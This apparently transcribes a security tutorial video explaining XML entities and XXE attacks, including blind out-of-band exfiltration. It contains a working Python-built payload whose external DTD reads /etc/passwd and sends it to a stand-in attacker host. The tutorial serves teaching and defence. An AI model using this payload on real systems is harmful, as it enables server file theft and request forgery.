XML just works. XML has great IDE usability. XML has comments. XML supports any formatting. XML is just great. Or is it?

Before we jump straight into the video, I'd like to introduce you guys to my buddy John Hammond, who's going to be joining me in today's episode. Take it away.

Hey, how's it going, everybody? My name is John Hammond, and I have a small YouTube channel that takes a look at capture-the-flag challenges and cybersecurity concepts just like this one. I want to give a special thank you to PwnFunction for letting me co-host here, and I'm really looking forward to this.

Let's start with XML. XML stands for Extensible Markup Language. It's similar to HTML, but the main difference is that HTML is about data representation, whereas XML is more about data transportation and sometimes storage. XML is human readable, and it's used in a ton of places, like APIs, UI layouts and styles in Android applications, configuration files, RSS feeds, and a lot more.

Let's look at a quick example of an XML document to understand its structure. The first line specifies the XML metadata, in this case the version, which will be used by the XML parser at the time of processing, and this is optional for some parsers. Here the person tag is the root element of the document, and every well-formed XML document has to have one and only one root element. Inside the root element we have two more nested tags, name and age, with some values.

There are some syntactic rules for a valid XML document, and here are some of them. Tag names are case sensitive, which means the opening and closing tag names have to be exactly the same. Certain characters like quotes, ampersands, and angle brackets are not allowed inside an XML document directly, because the parser would have a hard time understanding whether the input was part of a value or a tag. The workaround for this is something called entities. Entities are simple storage units; think of them as variables for XML. You can assign a value to one and use it multiple times in
different parts of the XML document. These entities are defined in a separate part of the XML document called the document type definition, or simply DTD.

Let's take a look at a simple example to see how entities work. As you can see, we've just modified our previous example. An entity is created inside a DOCTYPE, which basically tells the XML parser that this is a document type definition, inside which we've defined a storage unit, or simply an entity, and we've named it name. Instead of writing John directly as the value of a tag, we've used an entity and referred to it down in the name tag. This saves a ton of time when the same value is used in multiple places inside the XML document.

There are three types of entities: general, parameter, and predefined entities. The example that you saw just now is a case of general entities, where we just have some value that's being referenced somewhere else. Parameter entities are somewhat special. They are only allowed inside a DTD, and they are more flexible; for example, you can create an entity whose value is another entity. This feature is really useful when it comes to exploiting XXEs, or XML external entities. Lastly, we have predefined entities, which are just a set of predefined values for special characters like quotes and ampersands, which might break the XML document. For example, when you try to use a less-than symbol in your document as a value, the XML parser would error out. Why? Because, like I mentioned earlier, special characters like angle brackets and quotes can break the XML document. To get around this problem we have predefined entities, so instead of using a less-than symbol directly you can use &#x3c;, which is basically the hex representation of the symbol's ASCII value.

Now that we know a bit about XML, it's time for us to jump into the security parts of it. Let's start with entities. Just as we saw earlier, entities are just like variables which can store values
and then can be used later on. But XML is much more than just storing some values in an entity and using them. There are a lot more features offered by the XML standards, and external entities are one of them. Entities can not only store the value that you specify, but they can also pull values from a local file, or even fetch remote data over the network, and store them as entities for later use. As you can see, this opens up a wide attack surface.

Now let's take a look at how external entities work. In this example we have an entity called subscribe, and it's being used down in the pwn tag. You might have noticed that the syntax for the entity definition is a bit different from what we saw earlier. There's a new keyword called SYSTEM, and what's that? Well, SYSTEM is a keyword used in an entity to let the XML parser know that the entity is of type external, simply telling the XML parser to fetch the external resource and store it inside the entity. Another thing to keep in mind is that if the external resource contains anything remotely close to XML syntax, like a tag, then the XML parser will throw an error letting you know that the XML parsing failed. We'll get back to this in a later part of the video, but for now just remember that this is expected behavior.

Now, coming back to the example, the last part you need to know is that the value of this entity is not secret.txt. In fact, that's just the name of the file you would like to read from; the actual value is going to be calculated at the time of parsing. The file name doesn't have to look like this. XML accepts any valid URI, which includes file, HTTP, and other protocols. And now if we parse the XML file in an XML parser, boom, you see the contents of the file secret.txt.

Let's try this with /etc/passwd. We modify the value in the XML to the file that we want to read and, boom, we see the contents of /etc/passwd. And there you go, we have the ability to read local files, and this attack is called XML
external entities, or simply XXE. And reading local files is just the beginning. Instead of a file name, we can also provide a URL like this, and the XML parser would happily fetch the resource for you.

There are different types of XXE, mainly in-band, error-based, and out-of-band. The previous example was pretty much about in-band XXE, where the XML will be parsed and the output will be shown directly on the screen. The error-based type is somewhat like a blind XXE, where you don't get to see a lot of information except a bunch of errors. Lastly, we have the OOB, or out-of-band, XXEs. These are truly blind, which means the XML will be parsed and you don't get to see any of the output, and you would have to make some sort of out-of-band request to exfiltrate the data.

Let's look at a simple out-of-band XXE scenario. We have this web application which parses your XML input and says nothing about it in the response, meaning that this is just a blind XXE. So to test for blind XXEs, we can simply make a request to our web server using external entities instead of the file path. Let's try that. If we use the same XML code from the earlier example and modify the file path to an external URL, in our case it's just going to be attacker.com, and if we send it over, we get the request logged on our server. Nice. This confirms that the server is properly parsing our XML and trying to fetch an external entity. This is cool: we can make requests as the server. This is also known as server-side request forgery, or SSRF for short.

But can we do more than just make random requests? Well, we do know that we can read local files from the server and display them, but can we exfiltrate the same file contents in a blind XXE attack? Yes, we can. But before jumping into the attack, let's talk about DTDs, because they play an important role in XXE attacks. We've seen DTDs before. They look something like this, and they are defined inside a DOCTYPE. You might have noticed that the DTD isn't directly a part of the data; they
are defined above the root element in an XML document. This might be a hint to another feature of DTDs, which is that DTDs can be loaded externally. Just like with entities, you can specify a URI, and then at the time of processing the parser will fetch the external DTD and parse its contents. This allows you to have an organized XML document by separating the definition from the data. This feature is very useful not just for developers but for attackers as well. If you can load an external DTD, then you can unlock another feature of XML, which is that you can use parameter entities within the markup declaration itself.

Let's look at a simple example to understand the whole mess a bit more. Consider this example. We have an internal DTD, or document type definition, and we have defined a special type of entity called a parameter entity. This lets us do some crazy things, like defining one entity inside another. Parameter entities are only allowed to be referenced inside a DTD. Below the definition we have our main markup, that is, the pwn tag, and we've referenced a general entity inside of it.

Now let's trace how the XML parsing works at a high level. When the XML parser sees this code, it first looks at the version, and based on the version it starts processing the markup. The next thing it does is look for a DTD, or document type definition, that we've defined inside the same XML document. This is also called an inline DTD. Then it looks at the percent symbol and tries to parse it as a parameter entity. Now it assigns the markup of the general entity as the value of this parameter entity. In the next line we're referencing the parameter entity that we just created, so the parser will substitute the value of that entity at that position. At the end of the definition, after parsing, it might look something like this. As you can see, it's very straightforward at this point. Now we can access the value of the general entity by referencing it inside the pwn tag.

So now that we know we can use
the parameter entity directly inside the DTD, let's try to construct a blind XXE payload. Consider this as our payload. Let's quickly run through the XML parsing, ignoring the stuff that we already know. First, the parser will read the contents of /etc/passwd and store them in the passwd entity. This is a parameter entity and not a general one, because we want it to be used inside the DTD. In the next line you can see that there is a general entity as the value of the parameter entity called wrapper. Now, when the replacement happens, the entire markup might look something like this. As you can see, this is a general entity, and when you try to reference it, it will make a request to an external resource, and the contents of the file will go along with it as a part of the URL. Boom, we can steal the contents of the file in a blind XXE, right? Let's try that.

And nope, it didn't work. Why? Because according to the XML specification, in an internal DTD subset, parameter entity references must not occur within markup declarations. This means that you cannot reference a parameter entity within a markup declaration, but you can reference it at the same level as the markup declarations. Well, that's kind of confusing, to be honest.

So, this video is still running, it's not over yet, so that means there is a bypass for this, right? Yes, there is, and it's through external DTDs. Whatever I just explained to you doesn't work within an internal DTD, but the specification also states that this constraint doesn't apply to external DTDs. So that means we do have a bypass: all we have to do is use an external DTD instead of an internal one.

Now let's try to include a simple DTD file in our XML. As you can see, there are no entities defined within the DOCTYPE itself, but we're trying to include an external DTD which has all the entities we need inside of it. So now when you include it from an external resource, it works exactly like we saw earlier, but it also allows you to use parameter entities more flexibly. Let me explain.
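A minimal sketch of what the two pieces of such an external-DTD payload might look like, written as Python string builders so each part is easy to inspect. The entity names passwd, wrapper, and send follow the narration; the host attacker.example, the file name evil.dtd, and the listener port are assumptions for illustration, and the exact text shown on screen in the video may differ.

```python
# Template for the attacker-hosted DTD (external subset). Inside an external
# DTD, the %passwd; reference is allowed within the value of another entity.
DTD_TEMPLATE = '''<!ENTITY % passwd SYSTEM "file://{target}">
<!ENTITY % wrapper "<!ENTITY send SYSTEM '{exfil}/?%passwd;'>">
%wrapper;
'''

# Template for the document sent to the target: it defines no entities itself,
# it only pulls in the external DTD and references the general entity "send".
DOC_TEMPLATE = '''<?xml version="1.0"?>
<!DOCTYPE pwn SYSTEM "{dtd_url}">
<pwn>&send;</pwn>
'''


def build_external_dtd(target_file: str, exfil_url: str) -> str:
    """Return the DTD text that reads target_file and appends it to exfil_url."""
    return DTD_TEMPLATE.format(target=target_file, exfil=exfil_url)


def build_document(dtd_url: str) -> str:
    """Return the XML document that loads the DTD hosted at dtd_url."""
    return DOC_TEMPLATE.format(dtd_url=dtd_url)


if __name__ == "__main__":
    # Hypothetical attacker host and port, used only to render the strings.
    print(build_external_dtd("/etc/passwd", "http://attacker.example:1337"))
    print(build_document("http://attacker.example/evil.dtd"))
```

The sketch only builds text; whether a given parser fetches the DTD and expands the entities depends on that parser and its configuration.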
Consider this payload. We have an XML file with an external DTD attached to it, and we're referencing a general entity, send. But where is this send entity? Well, the send entity is inside the evil DTD file. Let's see the contents of it so that we can understand everything better. As you can see, we're doing the same stuff: after reading the passwd file, we create another parameter entity called wrapper, with the general entity send as its value. Then, when wrapper is referenced down below, it substitutes the contents of the passwd file in here as a part of the URL and turns it into a general entity. So now in our main XML file we include the DTD, and this is pretty much replaced with what we just calculated. And now we do know where the send entity came from: it's right here. When you try to reference it, it will make a request to fetch the external entity, but it doesn't get anything back, and we don't really care whether it gets a valid response or not, because we have successfully exfiltrated the passwd file.

Now let's try this. I have the server which hosts the DTD file, and I also have netcat listening on port 1337, waiting to receive the contents of the passwd file. Now when I send the XXE payload to the server, boom, I get the contents of the passwd file. Sweet.

All right, now that we know how to exfiltrate the passwd file, let's try the same with another file, like /etc/fstab, which is just a file that contains the necessary information to automate the process of mounting partitions. Let's give this a shot. Hmm, it didn't work. What happened? As you saw, we didn't change anything except the file name. It worked with /etc/passwd but not /etc/fstab. Let's check out the contents of fstab. It seems fine, or is it? As you can see, there are a bunch of comments, some of which look like XML tags, so the parser will try to parse the contents. But as you know, they're just comments and not well-formed XML syntax, so this breaks the parser and it errors out. So how do
you exfiltrate such breaking data? The answer is CDATA. CDATA stands for character data, and it's a special syntax which can handle these breaking artifacts. Whatever is in between the opening and closing CDATA markers will not be parsed as markup by the XML parser. Awesome, that's exactly what we wanted. The syntax for CDATA looks like this, and it begins and ends with these markers.

For our XXE attack, can we do something like this? The idea here is that start will be replaced by this and end will be replaced by that, so in the end it looks something like this. But this doesn't work, because it's a violation of the specification. The value of a general entity has to be well-formed, which means you cannot have an open CDATA marker like that. Once you open it, you have to close it within the same entity, but we're trying to split it across multiple entities, so this doesn't work for us.

The solution to this problem is to use parameter entities and external DTDs. The XML looks very similar to the one we saw earlier, but there are minor differences. In the DTD we are reading /etc/fstab, and we're also defining two parameter entities, which are basically the starting and ending points of the CDATA section. In the end we create a wrapper which has a general entity with all three values as one. In the end, everything looks something like this, and now we can exfiltrate the data. But if this is a blind XXE, you have to include another DTD and then send the data over, just like Pwn showed you earlier.

XML is not just used in APIs; it's also used in a ton of other places, like SVGs, PDFs, office documents, and others. If you want to listen to an awesome story on blind out-of-band XXE via PDF file uploads, check out STÖK's video.

In this video we've just explored how we could read files off of the server, but you can do a lot more than that with XXEs. You can also do DoS attacks, which I'm not a fan of, but still, you can eat a lot of computational resources on the server, and it's worth taking
a look at it. You can also perform server-side request forgery attacks via XXEs, and Fulcrum on Hack The Box is a great example of this. If you want to know more about it, check out IppSec's walkthrough video on it. And in some cases it's possible to gain remote code execution as well. Additionally, check out the work of Nicolas, and I'm not going to try to pronounce his last name, because it's hard, to be honest.

Also, I'd like to thank John for joining me in this episode. Check out his channel as well. I'll leave the links to everything in the video description.

I'd like to say one last thing. XML parsers are weird. Each parser behaves differently, even though there's a good specification for it. Honestly, I don't understand them. So: XML is old, XML is complex, XML is not great, and XXE is just the beginning.
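The fstab failure and the CDATA fix described earlier in the episode can be tried locally without any external entities. This is a minimal sketch using Python's standard xml.etree.ElementTree parser; the sample comment line is an assumption that only resembles the header of a typical /etc/fstab, and other parsers may report the error differently.

```python
import xml.etree.ElementTree as ET

# Sample text resembling the comment header of /etc/fstab (an assumption,
# not the contents of any real file).
FSTAB_COMMENT = "# <file system> <mount point> <type> <options>"


def parses(document: str) -> bool:
    """Return True if the document is well-formed XML, False otherwise."""
    try:
        ET.fromstring(document)
        return True
    except ET.ParseError:
        return False


# Dropped in as-is, the angle brackets are read as (broken) tags.
raw_document = f"<pwn>{FSTAB_COMMENT}</pwn>"

# Wrapped in a CDATA section, the same text is treated as character data.
cdata_document = f"<pwn><![CDATA[{FSTAB_COMMENT}]]></pwn>"

if __name__ == "__main__":
    print("raw parses:", parses(raw_document))
    print("CDATA parses:", parses(cdata_document))
    print("recovered text:", ET.fromstring(cdata_document).text)
```

The raw document fails because text such as `<file system>` is read as a malformed start tag, while the CDATA-wrapped version hands the same characters back untouched.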